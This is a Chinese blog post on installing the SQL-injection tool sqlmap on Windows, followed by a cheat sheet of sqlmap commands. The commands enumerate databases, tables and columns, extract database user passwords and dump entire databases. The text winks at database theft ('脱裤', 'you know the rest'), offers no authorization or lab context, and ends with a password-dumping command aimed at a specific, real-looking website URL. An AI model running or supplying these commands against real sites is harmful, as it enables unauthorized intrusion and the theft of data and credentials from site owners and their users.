欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  科技

win下安装sqlmap的方法分享

程序员文章站 2022-08-26 16:51:57
win下安装sqlmap的方法分享...

为方便大家使用,已经为大家封装了一个版本,下载地址
1、首先下载sqlmap 。
2、其次下载用于windows系统的python …………

3、然后安装python:
python默认安装的路径是“c:\python”(你也可以修改安装路径,但要记住路径),直接默认安装“下一步”ok …

4、解压sqlmap.zip里面的文件…

5、找到你安装python的目录(对于我来说:c:\python27中)

6、现在,在python文件夹中创建一个新的文件夹,并命名为“sqlmap”

win下安装sqlmap的方法分享

 

7、然后把你刚才解压的sqlmap中的文件全部复制到c:\python27\sqlmap文件夹里面

win下安装sqlmap的方法分享

8、最后在桌面空白处右键创建一个新的快捷方式:并命名为“sqlmap”

9、点击刚才创建好的sqlmap快捷方式右键—在目标栏输入:%windir%\system32\cmd.exe
如图:

win下安装sqlmap的方法分享

 

创建好之后,运行你刚才创建的sqlmap快捷方式 这样就可以在windowsxp运行sqlmap了。

执行命令:python sqlmap/sqlmap.py -help
win下安装sqlmap的方法分享

具体的一些命令:

mssql access 直接爆表.然后你懂的
bt5里面的话前面就要加python
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users 查看用户权限
sqlmap.py -u url --tables -d 数据库 //爆表段
sqlmap.py -u url --columns -t 表段 -d 数据库 //爆字段
sqlmap.py -u url --dump -c 字段 -t 表段 -d 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -c 字段 -t 表段 -d 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py -u url 判断
sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -d '表' 爆表
sqlmap.py -u url --columns -t ‘表’-d ‘数据库’爆列
sqlmap.py -u url --dump -t '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0


这儿我们将所有的库导出来,我想这就是前段时间盛传的脱裤吧,在执行这项操作的时候,会把所有的表里的内容导入到当前的一个目录下,看着清楚明了,但是花费的时间和很长。
sqlmap -u "http://www.newwide.com/newsphp?class=news&id=5&page=1&catalog_id=2" --users --password 爆用户密码

相关标签: sqlmap Win